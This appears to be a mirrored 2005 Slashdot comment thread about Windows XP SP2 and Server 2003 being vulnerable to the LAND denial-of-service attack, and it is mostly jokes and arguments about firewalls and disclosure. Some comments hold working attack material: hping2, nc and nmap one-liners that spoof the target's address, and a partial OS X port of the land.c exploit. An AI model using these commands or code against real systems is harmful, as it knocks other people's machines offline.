Slashdot Mirror
Windows 2003 and XP SP2 Vulnerable To LAND Attack
An anonymous reader writes "Dejan Levaja, a Serbian security engineer has discovered that nearly 8 years after the attack was first made public, WIndows 2003 and Windows XP SP2 are in fact vulnerable to the historic LAND attack." Granted, you need to have the firewall turned off for this work, but there's a whole lotta machines that don't have it turned on.
Are only Windows platform vulnerable or will these attacks be successful on other non-ms platforms ?
Trolling using another account since 2005.
It is also subject to sea and air attacks.
In other news, my computer is also prone to failing if I microwave it... hit it with a hammer, or attempt to install water cooling while I'm drunk...
---
Programming is like sex... Make one mistake and support it the rest of your life.
"Granted, you need to have the firewall turned off for this work, but there's a whole lotta machines that don't have it turned on."
Machines that are not protected are vulnerable. Well, that isn't really news is it? Sounds pretty silly to me.
Only one remote hole in the kernel FOR eight years!
You mean to tell me that XP and 2k3 contain buggy legacy code? that IS news!
Isn't this EXACTLY what regression tests were designed for?
The pirates come by sea, not LAND.
if a 6.1 KB file takes 20 seconds to get downloaded?!
only that the server is going to get fried
And everybody is surprised by this because...?
"It's the height of ridiculousness to say for those 9 lines you get hundreds of millions."
Amazing, if I don't use I firewall, I'm vulnerable. Who would have thought?
E = m c^3 Don't drink and derive E = m c^3
Anyway, given all the warnings about Internet security in the last five years, the majority of users will already have downloaded and installed firewall programs such as ZoneAlarm.
Not trying to be an M$ apologist, but who will really be vulnerable to this? Home (l)users will most likely have the firewall on (because it is on by default) and any sane IT dept. will have a hardware firewall guarding any internet facing windows boxen. If you haven't firewalled your boxen in this day and age, you pretty much get what you deserve.
It may be a little thing called a firewall. A firewall is a spyware-like little piece of software that constantly pings a special server called a firedoor so that spammers hackers, and their ilk know when your computer is available on the internet. Unfortuntely Microsoft refuses to release a patch for this thing but a piece of software called a backdoor can be used to prevent the firewall from doing its dirty work. Download one today!
01 if by LAND, 10 if by SEA
Let's hope Dejan Levaja does not fall victim to the usual retaliation by big software co's like Dmitry Sklyarov.
This is not the sig you are looking for...
At least with SP2 there is some basic security in terms of the firewall being on by default.
Still, never thought I'd see a slashdot article linking to a page about Trumpet Winsock in 2005!
Get a free iPod Nano 4GB!
In this case, your computer is prone to failing when someone else decides that it should go down.
Windows is one of the safest OS around (and to keep it that way it is advised that the computer should not be connected to internet or any other network for that matter)
fuvoo: watch something
Microsoft was informed 7 days ago (25.02.2005, GMT +1, local time), NO answer received, so I decided to share this info with security community.
Of course they didn't reply. They're under LAND attack, and your message is caught in the server. You must have sent them a proof-of-concept, so what did you expect?
"It's the height of ridiculousness to say for those 9 lines you get hundreds of millions."
So it's a way to either remotely lock up or reboot a target machine. I would assume (not having, you know, tried it or anything) that this includes most windows-based webservers.
Tm
Support TBI Research: http://www.raisinhope.org
Of course, some windows machines need to have open ports, like, say, if they're offering *services*. So really, your mundane desktop need not be affected. It's the production server you should be quite terrified about.
WARNING: there is a trojan on your
A friend showed this to me a few days ago and I was unable to reproduce the attack over the LAN, both with my own code and some code of the original LAND found with google. Both were run from linux by opening a raw socket, filling in ip and tcp headers including checksums using the structs in ip.h and tcp.h, and sending with sendto(). In both cases ethereal would show the packet as recieved but the machine would operate normally.
8 years is hardly enough to figure out how to patch windows.
Besides, like all everyone here says, it is the users own fault for not using a firewall. Having an expectation that 8 yr old attacks should be fixed is just unreasonable.
WTF, are you all on crack?
if i read correct:
Sending TCP packet with SYN flag set, source and destination IP address and source
and destination port as of destination machine, results in 15-30 seconds DoS condition.
SO sending every 10 seconds such a packet to a windows internet (http) host will make it disappear form the internet? DOS attack? that is lame.
I remember the days of Ping of Death, Land, Teardrop, New Tear, Bork, etc.
Now that my WinXP SP2 system is susceptible to land again, it's getting me into a nostalgic mood. I think I'll go play Ms PacMan on my MAME cabinet now.
I'm a big tall mofo.
Just remember that these people running 2003/XP without a firewall would also be running *NIX with a root password of "password". Mine is 12345
I have yet to install SP2 because I heard it hurts performance of some computer games, which is mainly what I use my windows PC for.
I am otherwise up-to-date with windows updates. I have a linksys router for my internet connection, but no software firewall.
Am I vulnerable to this and other issues? Should I update to SP2 already (the first time I tried it crashed while installing, didn't even work, but I could prob. get it to work next time). Or should I stay with SP1 for games?
Thank you.
You are trolling of course but recently I was thinking WHAT IF an idealisticly-minded political leader gets right exposure to "free as in freedom" concept.. Not necessarely W mind you.
The server has been slashdotted... guess it wasn't such a bad idea after all. Now fewer people can get to that file :)
and the usb slots closed lest you should hurt your OS
WTF is a LAND attack? From the source:
"LAND attack:
Sending TCP packet with SYN flag set, source and destination IP address and source and destination port as of destination machine, results in 15-30 seconds DoS condition."
If I understand correctly, this means the vulnerable machine will attempt to synchronise a connection with itself?
I find this quote enlightening:
"Ethic:
Microsoft was informed 7 days ago (25.02.2005, GMT +1, local time), NO answer received, so I decided to share this info with security community. "
So the vulnerability was made public. So exploits are going to be made. However, if Microsoft, who claim to have shifted more focus to security issues, had even acknowledged this report, the vulnerability wouldn't have become public so soon without a patch.
Kinda worries you about the way computer security is handled, doesn't it?
Misleading titles? Inflammatory blurbs? Keep in mind that Slashdot is a tabloid.
In other news, most homes are vulnerable to the classic BREAKIN attack if doors are left unlocked.
Film at 11.
leaving your firewall, spamblocker, pop-up blocker, and virus protection programs off will leave your computer vulnerable to serious attacks....
I mod down so you can mod up. Your welcome.
We've moved on to more productive uses of vulnerable machines (e.g. spam zombies). Who wants to do a DOS attack on a machine without a firewall anyway? What's the point?
Have you read my blog lately?
to Dejan "Vue" Levaja! Thank you, I'm here 'till Thursday.
Experts say servers are vulnerable to the infamous CAFE attack. One drop can take down an entire network!
Granted you have to have a computer next to a cup of coffee for this to work, but MANY PEOPLE DO!!!!!!!!!!
If Nalgene water bottles are outlawed, only outlaws will have Nalgene water bottles.
Grab a copy of hping2 and try:
hping2 aaa.bbb.ccc.ddd -s 135 -p 135 -S -a aaa.bbb.ccc.ddd
Obviously, replace aaa.bbb.ccc.ddd w/ the ip address of the workstation you'd like to test
Yep, I never spell check.
More incorrect spellings can be found he
BSDI 2.1 (vanilla) IS vulnerable
BSDI 2.1 (K210-021,K210-022,K210-024) NOT vulnerable
BSDI 3.0 NOT vulnerable
Digital UNIX 4.0 NOT vulnerable
FreeBSD 2.2.2-RELEASE IS vulnerable
FreeBSD 2.2.5-RELEASE IS vulnerable
FreeBSD 2.2.5-STABLE IS vulnerable
FreeBSD 3.0-CURRENT IS vulnerable
HP-UX 10.20 IS vulnerable
IRIX 6.2 NOT vulnerable
Linux 2.0.30 NOT vulnerable
Linux 2.0.32 NOT vulnerable
MacOS 8.0 IS vulnerable (TCP/IP stack crashed)
NetBSD 1.2 IS vulnerable
NeXTSTEP 3.0 IS vulnerable
NeXTSTEp 3.1 IS vulnerable
Novell 4.11 NOT vulnerable
OpenBSD 2.1 IS vulnerable
OpenBSD 2.2 (Oct31) NOT vulnerable
SCO OpenServer 5.0.4 NOT vulnerable
Solaris 2.5.1 IS vulnerable (conflicting reports)
SunOS 4.1.4 IS vulnerable
Windows 95 (vanilla) IS vulnerable
Windows 95 + Winsock 2 + VIPUPD.EXE IS vulnerable
Trolling using another account since 2005.
Comment removed based on user account deletion
I know the land attack is old, but still, linking to a .c ? Why not link to the description of the attack and let that be enough. I was not aware /. was a scriptkiddie toolz warehouse. As stated by the article, there are still probably a bunch of machines this will affect, and putting a link directly to LAND.c on the main page probably isnt such a good idea. Whats next, root kits?
/. don't know how to use a search engine?
Honestly. Why don't you just stick your head in the ground every time there's a problem. If you don't see it, it can't be real.
C'mon. How much more difficult is it to go to google, type in "land.c" and get the source yourself?
Do you honestly think people visiting
Besides, any good system administrator has to assume that every user out there has access to the latest, greatest, and most sophisticated tools to get into their systems.
And this is an 8 year-old exploit to boot.
OH NOES! He linked to the h4x0r f13lz! Whut k4nz W3 DOOZ?! C4llz 0wtz t3h wh4mbul4nc3!!!11!!
It shouldn't matter a single bit what gets linked to. The information is out there, anyone who wants to find it will. You can't try and suppress it. And to say that linking to it makes it easier... what did I just say about search engines? Oh gee, I've been saved a whole 5 seconds from going to google and finding it myself. Maybe all windows machiens will be patched within that time?
Vizzini: You only think I guessed wrong - that's what's so funny. I switched glasses when your back was turned. Ha-ha, you fool. You fell victim to one of the classic blunders, the most famous of which is "Never get involved in a land war in Asia", but only slightly less well known is this: "Never go in against a Sicilian, when *death* is on the line.". Hahahahahah. [Vizzini falls over dead]
(Yeah, off topic, I don't care.)
I'm not a programmer, so looking through a C file isn't likely to give me any useful information, unless it's in comments at the beginning of the code. What's more, I imagine even programmers would rather just hear a summary than have to sit there and look through a bunch of code to figure out what it does.
/. stories, link to relivant and if possible, concise descriptions of terms that people are likely to be unfarmilar with. If you want to provide a link to source, do it seperatly and note it as such.
I mean ethical issues aside, it's just not that helpful to most people. I'm sure most people though "WTF is a LAND attack?" and cliked on the link to see. Getting a C file, is probably not the answer they wanted, espically given that it doesn't seem to be transfering, so I can't even see if it has useful comments or not.
When doing
I know the land attack is old, but still, linking to a .c ? I was not aware /. was a scriptkiddie toolz warehouse.
Not only that, it was unlabeled. That means anybody who follwed the link now has a copy of the malware in their machine's webcache, minimum. And if they saved it (to keep the list of vulnerable configurations, for example) they have the malware itself.
This simultaneously puts a bunch of slashdot readers at legal risk (from false prosecution and/or in-court character assasination, based on evidence from a siezed computer) and gives real baddies plausible deniability.
Bantam Dominique roosters crow a four-note song. Once you've heard it as "Happy BIRTHday" you can't NOT hear it that way
Looking at the code, this looks almost like something a firewall might let through. Let's say you have a web server. Obviously you must open up for syn packets to port 80. Would the Windows builtin firewall catch this?
I haven't read any comment saying that this really works, could anyone confirm this?
ajf
...so we all can modify the code and make a worm.land attack...
Security through obsecurity doesn't work. Here's the important part of the source :) Basically it just sends a SYN packet which has the target's address as the source and the destination (same port as well).
z eof(struct iphdr)/4;t tl=255;d dr=sin.sin_addr.s_addr;a ddr.s_addr;
h _dport=sin.sin_port;1 C);f f=sizeof(struct tcphdr)/4;
. s_addr;_ addr;g th=htons(sizeof(struct tcphdr));
---snip---
bzero(&buffer,sizeof(struct iphdr)+sizeof(struct tcphdr));
ipheader->version=4;
ipheader->ihl=si
ipheader->tot_len=htons(sizeof(struct iphdr)+sizeof(struct tcphdr));
ipheader->id=htons(0xF1C);
ipheader->
ipheader->protocol=IP_TCP;
ipheader->sa
ipheader->daddr=sin.sin_
tcpheader->th_sport=sin.sin_port;
tcpheader->t
tcpheader->th_seq=htonl(0xF
tcpheader->th_flags=TH_SYN;
tcpheader->th_o
tcpheader->th_win=htons(2048);
bzero(&pseudoheader,12+sizeof(struct tcphdr));
pseudoheader.saddr.s_addr=sin.sin_addr
pseudoheader.daddr.s_addr=sin.sin_addr.s
pseudoheader.protocol=6;
pseudoheader.len
bcopy((char *) tcpheader,(char *) &pseudoheader.tcpheader,sizeof(struct tcphdr));
tcpheader->th_sum=checksum((u_short *) &pseudoheader,12+sizeof(struct tcphdr));
---snip---
http://support.microsoft.com/default.aspx?scid=kb; en-us;165005
In Soviet Russia, Trojan exploits YOU!
Being a military type, I would assume that yes, most computers are vulnerable to the majority of conventional land-based assualts. This is due more to physics than software.
StrayByte.Net
This incident is just another example which demonstrates the importance that KDE, Mozilla & Mozilla Firefox's open source culture places on security. Hasn't anyone at Mozilla and KDE ever heard about regression testing?
This incident is just another example which demonstrates the importance (or more accurately, the lack thereof) that Linux's open source culture places on security. Hasn't anyone at Linux ever heard about regression testing?
Open source has consistantly (sic) demonstrated that, regardless of what their press releases say, security is NOT one of their priorities. People need to start waking up and realizing this before they entrust their critical infrastructure to open source products.
See how stupid your comment is? No? Didn't think so.
Just 5 minutes before I read this post, I turned firewall on my WinXP SP2 machine off, testing someting on our LAN.
Can you imagine what amount of fear I felt when I realized that this guy lived only 2 miles from my office...
No sig today.
I pointed this out YEARS ago. I just don't understand why the updated winsock didn't get used in 2k when they overhauled the tcp stack. (and wow is that an old email addy. heh)
Gonzo Granzeau
"Nothing the god of biomechanics wouldn't let you into heaven for.." -Roy Batty
... down the toilet
That's a list of operating systems from 1997, taken out of an exploit from 1997. Linux 2.0.30? Novell 4.11? Solaris 2.5.1?
HA! linking to a whole C file... You'd think they'd just link to a 2-line perl script.
Would all you morons shouting about firewalls shut up for thirty seconds and consider the following scenario:
User is in big corp behind firewall.
User receives email claiming to be something or other.
User runs attachment.
All 'doze boxes in big corp stop working.
Firewalls are (a) not the answer to all crap coding and (b) not perfect solutions even so.
Justin.
You're only jealous cos the little penguins are talking to me.
Back in the day..
I remember using BitchX on my old Slackware machine on a 10base2 lan connection at work..
Hanging out in the popular IRC channels armed with some onjoin and onexit and mass nuke scripts. Wiping people out left and right. Others would improve the scripts to the point a few clicks and you could basically wipe out whoever you wanted and spoof the source address. At first people were confused but eventually people started to catch on that something strange was going on. People that patched were still hanging around and would try to offer help to others. I remember some of the patched guys threating to report to the IP address of the people doing the nuking to the ISP and to the ops. Of course the scripts would use the source IP address of the destination so they in fact looking real stupid complaining about themselves. "Hey asshole at 204.123.123.123, I see you trying to nuke me", shortly after the ops would ban that person because that was his own address. There were other quite a few large holes back then that would effect many different systems. If I remember correctly, it was ssping, winnuke, and land, all showed up withing weeks of each other. Luckily I also had access to a DEC machine shell from a CS department friend at a college campus and could connect back to the Linux channels with IRC on that machine to see what was going on and what needed patched, recompile whatever with the patches and get my Linux machine back on. It was a fun few months. Back then MS security consisted of blaming the rouge users for sending packets that should not be on a network instead of accepting responsibility for their machines crashing because of it. Meaning, they played this off as their software was not the problem, it was the Linux and Unix people that needed fixed because they allowed these packets to be sent in the first place. All the while, everyone with MS software could not stay online for more then a few minutes before hard locking. It was fun while it lasted. I learned more about networking and Linux in that 3 months then any other 3 month period since.
The source and description are essentially the same, its a very simple attack, you don't really need a c compiler on most machines to pull it off:
nc -s $IP $IP 113
nmap -sS -s $IP $IP -p 113
or anything else that lets you connect with a spoofed ip.
Pain lasts, kid. Its how you know you're alive. Sometimes I think this growing up thing is just pain management-TheMaxx
Updates to TCPIP.SYS which will invalidate the lvllord Event 4226 patch.
Had to hack the old land.c to compile on my FC 3 machine, but it works nicely.
Every packet causes about 10 seconds of heavy CPU usage on Windows Server 2003. Ditto for Windows XP SP2.
Processes like a CS server running on the XP box were completely unresponsive. Let the DoSing begin.
Spaf and I dissected it back in 98: http://portal.acm.org/citation.cfm?id=353697
The interesting thing about land is that it resulted from two different interpretations of the RFC. One said send X in this state and another said Y. Hence, lots of unrelated protocol stacks had the vulnerability while others didn't.
But then you'd also think people would use good passwords, and not open virused attachments over and over. Working in the computer support industry, I can tell you that none of these are the case. People suck at the Internet. Though the instructions they need to follow are simple, as simple as say auto saftey, they simply refuse to learn.
For example, we have a lab here that chooses to maintain their own systems, rather than allowing us to do so. Their stated goal is network research, they are supposedly people that know about networking. So we get a call that we have a machine doing naughty things in the building, track it down, it's in that lab. It's a Linux system that nobody can figure out the password to because it's been completely 0wned. So we tell them to wipe it and so on. Next day, another call, and it's the same computer. Why? Well they just reinstalled the same old version of RedHat, with a load of services turned on, and didn't patch it. They were baffeled as to why this was a problem.
Now this is just one of my favourite examples, I can pick from hundreds, and I've only worked here a year. There are users who will open virused e-mail attachments over and over, users that spyware their computers to the point of unusability, and so on. It happens ALL the time, and indeed we spend a considerable amount of our budget getting technology ot protect users from themselves (like a departmental firewall, e-mail filter, etc).
Now, worst of all, we are a techical department, an engineering department. These aren't art majors here, and they still don't protect their computers.
So no, it's not valid to assume most people are safe, in fact I'd assume most people are not safe.
"Never get involved in a land war in Asia."
P.
Everytime MS has a security bug that causes millions in damage, MS gets a little bit more egg on their face.
So now we have Bill Gates and co. coming out and saying, "Windows is our #1 priority." Everyone feels better, because hey... Bill's on the case right?
Then, out of left-field, it turns out that Windows is vulnerable to an exploit that's practically ancient in the biz. And what if you can get through the firewall somehow? Or what if you're cruising around wireless networks on a laptop?
This kind of one-shot lockup is something from the dark ages of computing. Everyone's confidence in MSshould be lowered even further.
Slashdot. It's Not For Common Sense
The exploit is seven years old; linking to it will not cause an internet kill frenzy.
All I did was click on and open the c file, and Visual Studio .NET locked up while loading it, bringing Explorer down with it and rendering my system useless.
SP2 if by LAND, and SP3 if by Sea, lord help us when we get to SP6. ducks
For all those Paul Revere fans out there! :)
Any Nominus
From the blurb: Granted, you need to have the firewall turned off for this work, but there's a whole lotta machines that don't have it turned on.
Uh.... so what? The firewall lets you know you're not protected if it's not active. Let idiots suffer if they're too stupid to do what they need to do. FWIW; I think Microsoft's firewall fix is enough in the case of the mass user.
Dedicated Cthulhu Cultist since 4523 BC.
Unfortuntately the b0rked Slashdot lameness filter won't allow code to be posted even when 'post as code' is selected :?
Since this attack sends a packet with a source address of the target host rather than the attacker, won't this attack fail in a vast majority of remote situations (i.e. via Internet or not on the same LAN as the target)?? Doesn't almost every ISP filter outgoing packets for a bit of sanity, especially valid (or reasonable) source addresses? I know my ISPs at home (Adelphia cable) and work (AT&T data) do.
-Lod
The idea behind a server (such as the affected W2K3 server) being connected to a network is to provide a service to the clients. If the machine is not fit to provide services to the network, might as well go back to the store and ask for a reimbursment and exchange to XP workstation.
The only safe way to safely run this server is to place it behind a SPI firewall. Packet filters will have a hard time detecting and blocking this kind of attack, you will need a full blown SPI to defend and block against these attacks.
SMCs, Linksys and other consumer level firewall seem to be vulnerable to this thing, the only thing that might save your server is the NAT they might provide. Of course if you are running your server on a public routable IP, then you better start thinking of running a serious setup there.
My other OS is the MCP!
Granted, you need to have the firewall turned off for this work, but there's a whole lotta machines that don't have it turned on.
OK, so what you're saying is that in order for XP to be vulnerable, it must be directly connected to the Internet, the user must specifically have disabled the firewall, and no intermediate firewall must be present.
At what point do we cease blaming Microsoft for stupid user tricks? I mean, Microsoft has freely given SP2 to anyone who wants it. Pretty soon it will be a mandatory download from WindowsUpdate. People bitched and moaned for years that Microsoft didn't do enough for security and didn't default to having updates apply automatically. But when Microsoft finally does improve security (with a better firewall) and tries to turn it all on by default, everyone griped. Damned if you do...
Look, if a Windows zealot took something like Fedora, turned on a bunch of services, turned off the firewall, and then griped because his box got hacked, Slashdotters everywhere would be screaming that this guy was a fool, that Linux security is great when it's not sabotaged by an idiot at the keyboard. And they'd be right. But when an attack requires that a Windows user actively subvert the very security measures Microsoft's put in place to protect him, everybody blames Microsoft. Nope, no bias to see here, citizens, please move along.
In the end they will lay their freedom at our feet and say to us, Make us your slaves, but feed us. - Fyodor Dostoyevsky
One more who's actually read MSFT's "A parent's primer to computer slang". This is the first time I encounter the usage of "'sploits" in real life.
:/
Therefore, definitely a valueable comment of yours - thank you. Just a pity there's no "z" in it
:%s/Open Source/Free Software/g
YTARY!
He makes a point which undermines the microshilling of the grandparent post.
I hit a Windows XP SP1 box with this to no effect. I had to make some changes to even compile it (http://mixter.void.ru/glibc.txt). But the test box didn't blink.
perl -e 'foreach(values %SIG){$_="IGNORE";}while(){}'
Many corporate networks only protect the connection between the Internet and the LAN, and it only takes one sales guy to bring in a breached laptop to topple this type of security. I've seen this happen quite often.
-- I bought this SIG on ebay.
if((source_ip == dest_ip) && (source_port == dest_port))
:-p
{
break;
}
Am I missing something, or could Microsoft fix this glitch with pretty much the above code?
Btw Microsoft.. the above code is patent pending, so you better send me a check before using such complex algorithms
Believe it or not, some folks still use Solaris 2.5 and 2.6 versions. I used to work at a university whose physics department was fortunate enough to have two electron scanning microscopes, one old and huge and one new, smaller one. The old one had controlling software that was custom, to say the least, and written by a German firm that's been out of business for a few years now.
... unbelievable really), moving *away* from Sendmail, installing Solaris machines with everything locked down, etc, etc). Drove me fucking mad.
Guess what OS the software ran on? And what hardware connections were custom to the old Sparc-based controller the ran the thing? Wohoo! Old Solaris was the only way it'd still 'go'.
Well, sneaker-net wasn't going to work for the grads that were abroad and well, the profs wanted network access, so they were going to get it. Short of the long, we had to build, tweak and mess with all kinds of junk (tcpwrappers, ssh, ssl) before it went back on the network (yes, that donkey had been hacked before). So yes, there's lots of old Solaris still out there.
And before anyone asks, yes I finally quit that job due to *not* being able to secure things like this. Authenticating gateways, openvpn, pf on Solaris (boss would *never* let me put that on all the machines we cared for
Thanks for the BSD source code link, it compiled with no problems and what do you know, it actually does choke up an XP SP 2 box for 15-20 seconds. I was a little skeptical when I read this, but wow, it's true, and although it doesn't cause BSOD or reboot anymore it would be quite an irritant.
Ah yes, the class Princess Bride. Here's the entire "Battle of Wits" scene:
MAN IN BLACK: But if there can be no arrangement, then we are at an impasse.
Vizzini: I'm afraid so -- I can't compete with you physically. And you're no match for my brains.
MIB: You're that smart?
V: Let me put it this way: have you ever heard of Plato, Aristotle, Socrates?
MIB: Yes.
V: Morons.
MIB: Really? In that case, I challenge you to a battle of wits.
V: For the Princess?
MIB: [nods]
V: To the death?
MIB: [Another nod]
V: I accept.
MIB: Good. Then pour the wine.
V: fills the goblets with the dark red liquid
MIB: pulls a small packet from his clothing, handing it to Vizzini.
MIB: Inhale this, but do not touch.
V: I smell nothing.
MIB: What you do not smell is called iocane powder. It is odorless, tasteless, dissolves instantly in liquid, and is among the more deadlier poisons known to man.
V: Hmm.
MIB: [takes the goblets, turns his back. A moment later, he turns again, faces Vizzini, drops the iocane packet. It is now empty.]
MIB: [rotates the goblets in a little shell game maneuver then puts one glass in front of Vizzini, the other in front of himself.]
MIB: All right: where is the poison? The battle of wits has begun. It ends when you decide and we both drink, and find out who is right and who is dead.
V: But it's so simple. All I have to do is divine from what I know of you. Are you the sort of man who would put the poison into his own goblet, or his enemy's?
V: Now, a clever man would put the poison into his own goblet, because he would know that only a great fool would reach for what he was given. I'm not a great fool, so I can clearly not choose the wine in front of you. But you must have known I was not a great fool; you would have counted on it, so I can clearly not choose the wine in front of me.
MIB: You've made your decision then?
V: Not remotely. Because iocane comes from Australia, as everyone knows. And Australia is entirely peopled with criminals. And criminals are used to having people not trust them, as you are not trusted by me. So I can clearly not choose the wine in front of you.
MIB: Truly, you have a dizzying intellect.
V: Wait till I get going! Where was I?
MIB: Australia.
V: Yes -- Australia, and you must have suspected I would have known the powder's origin, so I can clearly not choose the wine in front of me.
MIB: [very nervous] You're just stalling now.
V: [cackling] You'd like to think that, wouldn't you? You've beaten my giant, which means you're exceptionally strong. So, you could have put the poison in your own goblet, trusting on your strength to save you. So I can clearly not choose the wine in front of you. But, you've also bested my Spaniard which means you must have studied. And in studying, you must have learned that man is mortal so you would have put the poison as far from yourself as possible, so I can clearly not choose the wine in front of me.
MIB: You're trying to trick me into giving away something; it won't work.
V: [triumphant] It has worked -- you've given everything away -- I know where the poison is.
MIB: [fool's courage] Then make your choice.
V: I will. And I choose -- [And suddenly he stops, points at something behind the MIB].
V: -- what in the world can that be?
MIB: What? Where? I don't see anything.
V: [switches the goblets while MIB's head is turned].
V: Oh, well, I-I could have sworn I saw something. No matter.
MIB: [turns to face him again]
V: [starts to laugh]
MIB: What's so funny?
V: I'll tell you in a minute. First, let's drink -- me from my glass, and you from yours.
MIB: Yo
AnimeNEXT anime convention
It doesn't need the firewall to be disabled. It just needs an open port. Many machines have some ports open for things like p2p. The summary should either not mention this at all or mention this in its entirity. Just saying that the firewall needs to be disabled is misleading (at least for some/most people).
Two guys are out hiking and they see a bear. One guy starts running and the other yells after him, "Hey, you can't outrun a bear!" He replies, "I don't have to - I only have to outrun you!"
Same logic applies here. You don't have to be perfectly secure (although that'd be nice, no doubt). You just have to be secure enough that others look like much better targets.
Ben Hocking
Need a professional organizer?
Yes, it actually works on SP2. Fire up Task Manager and watch CPU load reach 100% for ~10 seconds for a single packet.
Here's the code that should compile on Linux.
"Never go up against a Scicillian when DOS is on the line!"
Nuclear reactors are vulnerable to overheating which can result in a catastrophic explosion. Granted, you need to have the safety systems turned off for this to work, but the guys at Chernobyl didn't have them turned on.
News value: 0.
Quality of argument: 0.
Overall value: 0.
The source of this attack has been globally available for ouver 8 years, you twit. How exactly would not re-linking the C exploit be helpful? Even junior grade script kiddies know how to use google.
Democracy is a sheep and two wolves deciding what to have for lunch. Freedom is a well armed sheep contesting the issue
I just feel I want to try this exploit so bad now.
I'm this close to compiling and trying it out on one of my friends with WinXP :)
But look on the bright side. Now RIAA wont have to send out cease & disist letters anymore. If the k1dd13s haven't done it allready, now all they need to do is one simple command line to get the content off-line :)
Not Buzzword 2.0 compliant. Please speak english.
Windows users are vulnerable to Land Sharks.
Knock knock.
Who's there?
Pizza man.
I didn't order a pizza.
(pause)
Mailman.
Today is Sunday, there is no mail.
(pause)
Doorman.
Our building has no doorman.
(pause)
Travelling salesman.
I don't want anything.
(pause)
Gumby.
Oh, it's Gumby!
(opens door)
RARRRRRRR!!!!!
What you said about NAT is a good point, and something I just discovered while playing with this. NAT inherently defends against this attack because NAT only changes the destination address in the packet and not the source. This change breaks the premise of the attack. The other interesting point you made was that some SOHO routers are vulnerable. Assuming that the attack will be launched remotely, and assuming that most people left their SOHO router at default, there will be no open ports on the router itself, so despite being vulnerable to the attack the conditions don't exist for the router to be a target.
An american computer geek has discovered that if you don't set an administrative password, your computer is vulnerable to root attacks.
*gasp*
I am sorry but I don't see how the fact that your windows computer, if you don't have a firewall between it and the world, is vulnerable to attack, is news. It's more like common sense...
In fact, even if you install a firewall on your windows computer, it's still vulnerable to any number of dozens of attacks.
l8,
AC
the machines both winXP and win2k3 server did not crash and the program bounced right back to the command line. these are wide open machines on a local switch.
Haven't tried the code above, but I spent 5 minutes porting the linked code to OS X. It didn't take long and I am sure someone will compile it and be happy that their favorite OS can crash windows machines just as well as those Linux guys.
;
Funny story, DOS attacks were my first motivation to try Linux. I wonder how many other people are the same(oh, how the years go by). Anyways, here is the code. And, for the record... it is too hard to post code on Slashdot... A million filters to work through:-(
/* land.c by m3lt, FLC
* crashes a win95 box
*This is an OS X port
*Save the code as land.c/g++ land.c -o land
*/
#include <machine/types.h>
#include <unistd.h>
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/if_ether.h>
#include <netinet/in_systm.h>
#include <netinet/ip_var.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <netinet/tcpip.h>
struct pseudohdr
{
struct in_addr saddr;
struct in_addr daddr;
u_char zero;
u_char protocol;
u_short length;
struct tcphdr tcpheader;
};
u_short checksum(u_short * data,u_short length)
{
register long value;
u_short i;
for(i=0;i<(length>>1);i++)
value+=data[i];
if((length&1)==1)
value+=(data[i]<<8);
value=(value&65535)+(value>>16);
return(~value);
}
int main(int argc,char * * argv)
{
struct sockaddr_in sin;
struct hostent * hoste;
int sock;
char buffer[40];
struct ip * ipheader=(struct ip *) buffer;
struct tcphdr * tcpheader=(struct tcphdr *) (buffer+sizeof(struct ip));
struct pseudohdr pseudoheader;
fprintf(stderr,"land.c by m3lt, FLC\n");
if(argc<3)
{
fprintf(stderr,"usage: %s IP port\n",argv[0]);
return(-1);
}
bzero(&sin,sizeof(struct sockaddr_in));
sin.sin_family=AF_INET;
if((hoste=gethostbyname(argv[1]))!=NULL)
bcopy(hoste->h_addr,&sin.sin_addr,hoste->h_length)
else if((sin.sin_addr.s_addr=inet_addr(argv[1]))==-1)
{
fprintf(stderr,"unknown host %s\n",argv[1]);
return(-1);
}
if((sin.sin_port=htons(atoi(argv[2])))==0)
{
fprintf(stderr,"unknown port %s\n",argv[2]);
return(-1);
}
if((sock=socket(AF_INET,SOCK_RAW,255))==-1)
{
fprintf(stderr,"couldn't allocate raw socket\n");
return(-1);
}
bzero(&buffer,sizeof(struct ip)+sizeof(struct tcphdr));
ipheader->ip_v=4;
ipheader->ip_hl=sizeof(struct ip)/4;
ipheader->ip_len=htons(sizeof(struct ip)+sizeof(struct tcphdr));
ipheader->ip_id=htons(0xF1C);
ipheader->ip_ttl=255;
ipheader->ip_p=IPPROTO_TCP;
ipheader->ip_src=(const in_addr &)sin.sin_addr.s_addr;
ipheader->ip_dst=(const in_addr &)sin.sin_addr.s_addr;
tcpheader->th_sport=sin.sin_port;
tcpheader->th_dport=sin.sin_port;
tcpheader->th_seq=htonl(0xF1C);
tcpheader->th_flags=TH_SYN;
tcpheader->th_off=sizeof(struct tcphdr)/4;
tcpheader->th_win=htons(2048);
bzero(&pseudoheader,12+sizeof(struct tcphdr));
pseudoheader.saddr.s_addr=sin.sin_addr.s_addr;
pseudoheader.daddr.s_addr=sin.sin_addr.s_addr;
pseudoheader.protocol=6;
pseudoheader.length=htons(sizeof(struct tcphdr));
bcopy((char *) tcpheader,(char *) &pseudoheader.tcpheader,sizeof(struct tcphdr));
tcpheader->th_sum=checksum((u_short *) &pseudoheader,12+sizeof(struct tcphdr));
if(sendto(sock,buffer,
...before some jerkoff exploits this totally avoidable vulnerability inside the payload of a virus or trojan horse? Imagine that: Some dumb corporate cluck innocently clicks on an email attachment, and ten seconds later every other PC on the corporate LAN's subnet suddenly goes apoplectic, and they all stay that way until the infected machine is detected and shut down. We all know something like this will eventually happen, now that the LAND cat is out of the bag (again).
It gets worse: Suppose some nefarious bastard wanted to commit a crime and have plenty of getaway time. All he'd have to do is find a way to get a few key law enforcement machines trojaned, confirm their infections (with outbound pings or something), and then just time the LAND attack to correspond with the timing of the crime.
Gosh, it's so exciting to live in a world with a huge, homogenous population of highly-vulnerable mission-critical platforms!
About the word "if": If bullfrogs had wings, they wouldn't bounce around on their little green butts.
I think this is exactly what grand-parent was referring to!.
I hate to break it to you, but C code is a valid form of communication at slashdot.
:)
It's not our problem if you are C illiterate.
Ethic:
Microsoft was informed 7 days ago (25.02.2005, GMT +1, local time), NO answer received,
so I decided to share this info with security community.
Ethics?
When Microsoft didn't respond, you decided to tell the rest of the world that you can DoS some WinXP or 2003 Machine with ease? How is that ethical?
It can be analagous to someone saying "Hey, if you cut the red wire in [insert security system here] you can disable it and the cops won't come. [Insert security company] was informed and didn't respond in 7 days, so I decided to tell the rest of the world."
2 if by SEA
and screamed her fingers off.
